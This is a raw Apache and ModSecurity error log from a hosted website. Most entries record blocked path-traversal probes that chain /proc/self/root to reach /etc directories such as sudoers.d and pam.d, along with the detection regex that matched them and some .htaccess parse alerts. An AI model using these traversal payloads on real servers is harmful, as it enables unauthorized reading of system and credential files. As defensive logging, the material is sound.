"abvAtxkFeYa1D6dYQnDL5gAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:24:14.345164 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.243.128:39024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAvv-YZRR_7pZ7nDJp-gAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:24:21.923400 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.243.128:39034] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvAxV_V7PWP6ixUYl6YSgAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:24:27.154154 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:24:52.131905 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49480] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:25:16.125888 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50058] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:25:41.129792 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:25:59.884413 2026] [:error] [pid 14269:tid 140411716749056] [client 74.7.228.61:59480] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvBJwbLMZ6AikZjR9U5tgAAAAM"]
[Thu Mar 19 06:26:04.099990 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51312] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:26:27.906228 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:26:51.137861 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52568] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:27:19.161795 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:27:41.137835 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:28:04.133840 2026] [proxy_fcgi:error] [pid 19093:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54662] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:28:27.133813 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55320] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:28:50.137774 2026] [proxy_fcgi:error] [pid 17653:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55966] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:29:12.125840 2026] [proxy_fcgi:error] [pid 31803:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:29:33.506125 2026] [mime_magic:error] [pid 17653:tid 140411641214720] (70014)End of file found: [client 57.141.18.107:59902] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:29:34.065828 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57054] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:29:57.158088 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57716] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:30:02.914676 2026] [mime_magic:error] [pid 14269:tid 140411607643904] (70014)End of file found: [client 57.141.18.80:60644] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:30:05.503530 2026] [core:alert] [pid 27403:tid 140411574073088] [client 57.141.18.114:60652] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching <IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> section
[Thu Mar 19 06:30:16.628793 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:58372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvCKPu8EFLIOrSqIpt97AAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:30:21.063363 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58264] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:30:27.284474 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:40016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvCM_-YZRR_7pZ7nDJq8QAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:30:46.129929 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58830] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:31:10.157771 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59414] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:31:34.033793 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60094] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:31:58.740010 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:39780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvCjgkwaGbbGflqUZCXDgAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:31:59.124571 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60830] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:32:05.483311 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:39994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvClAkwaGbbGflqUZCXEgAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:32:23.100336 2026] [proxy_fcgi:error] [pid 19093:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33262] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:32:26.920020 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:33204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvCqta6ubjKNq_cu4YkWgAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:32:32.751463 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:37946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvCsOyqAr6etmhZHNpBewAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:32:42.259710 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:38626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvCuuoXxyEfFpUF8f_tmQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:32:47.125887 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33874] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:32:48.550347 2026] [:error] [pid 27403:tid 140411691570944] [client 74.7.243.128:42776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvCvxkFeYa1D6dYQnDM-wAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:33:01.987635 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.244.43:57244] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvCzV_V7PWP6ixUYl6ZqgAAApI"]
[Thu Mar 19 06:33:12.131901 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34440] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:33:37.101851 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35070] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:34:01.130575 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35762] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:34:11.718639 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.243.128:42776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvDExkFeYa1D6dYQnDNRgAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:34:22.065822 2026] [proxy_fcgi:error] [pid 14269:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36304] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:34:25.446348 2026] [core:alert] [pid 30077:tid 140411683178240] [client 57.141.18.33:39194] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 06:34:48.126075 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:35:18.621848 2026] [mime_magic:error] [pid 14269:tid 140411548894976] (70014)End of file found: [client 74.7.241.31:57322] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/lib/cloud/scripts
[Thu Mar 19 06:35:20.121803 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37702] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:35:24.603621 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:34244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvDXPu8EFLIOrSqIpt-pAAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Thu Mar 19 06:35:50.133846 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38542] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:36:05.100770 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.228.61:51152] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvDhf-YZRR_7pZ7nDJrrQAAA9A"]
[Thu Mar 19 06:36:13.125925 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:36:25.450345 2026] [core:alert] [pid 17887:tid 140411658000128] [client 57.141.18.121:41964] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 06:36:37.153793 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39832] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:36:39.689489 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:38920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvDp8df6f5d65gmYZRSdwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:36:44.022128 2026] [mime_magic:error] [pid 30077:tid 140411649607424] (70014)End of file found: [client 57.141.18.107:42572] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:37:02.167695 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40390] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:37:27.138771 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41046] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:37:46.275481 2026] [mime_magic:error] [pid 31803:tid 140411548894976] (70014)End of file found: [client 57.141.18.82:43902] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:37:50.125790 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41602] AH01075: Error dispatching request to : (polling)
